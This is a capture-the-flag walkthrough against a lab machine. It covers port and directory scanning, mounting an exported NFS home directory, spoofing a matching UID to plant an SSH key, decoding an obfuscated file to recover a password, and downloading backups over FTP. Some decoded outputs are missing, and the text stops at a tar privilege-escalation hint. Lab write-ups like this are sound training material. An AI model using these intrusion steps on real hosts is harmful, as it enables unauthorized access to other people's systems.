We start scanning the host with : nmap –A –T4 –p- 192.168.1.20 –vv
Running dirb http://192.168.1.20 /usr/sharw/dirb/wordlists/big.txt
There is port 111 so we use showmount -e 192.168.1.20
Now we mount the folder to our machine
mkdir /tmp/morris
mount 192.168.1.120:/home/morris /tmp/morris
But now we can’t do anything as it gave us Permission Denied, let’s create a morris user on our machine so we can copy the ssh file to the host.
ls -ld morris
drwxr-xr-x 8 1000 1000 morris 4096 Oct 11 14:40 morris
groupadd –gid 1000 morris_group
useradd –uid 1000 –groups morris_group morris
mkdir morris/.ssh
cp ~/.ssh/id_rsa.pub morris/.ssh/authorized_keys
when we try to login using ssh morris@192.168.1.20 –p 7822
it asked for a password , so I guess we have to try another way .
I downloaded all the files I found on the site from pictures to the css , using strings and cat on the pictures didn’t come up with any results, but I found a file bootstrap.min.cs to be wired with a lot of string coding .. after looking on google for a while I found this site www.jsfuck.com I copied the content of the file without the “” and removed the var= from the file and ran it and it came with:
Now we have another user Norris, and the password TryToGuessThisNorris@2k19
Now going into ftp file we can download the bak files to our machine
Norris
TryToGuessThisNorris@2k19
Mget *.bak
Going into the files with strings command we can see one file game.jpg.bak
It hit me to see it as mores code , decode it online and I got this message
Cd to var/www/html and ls –la
Trying to open the file .sercetfile.swp in the browser then we download it to our machine and strings it gave us:
After enumerating for a while I found we can use tar command , now its easy to use tar as:
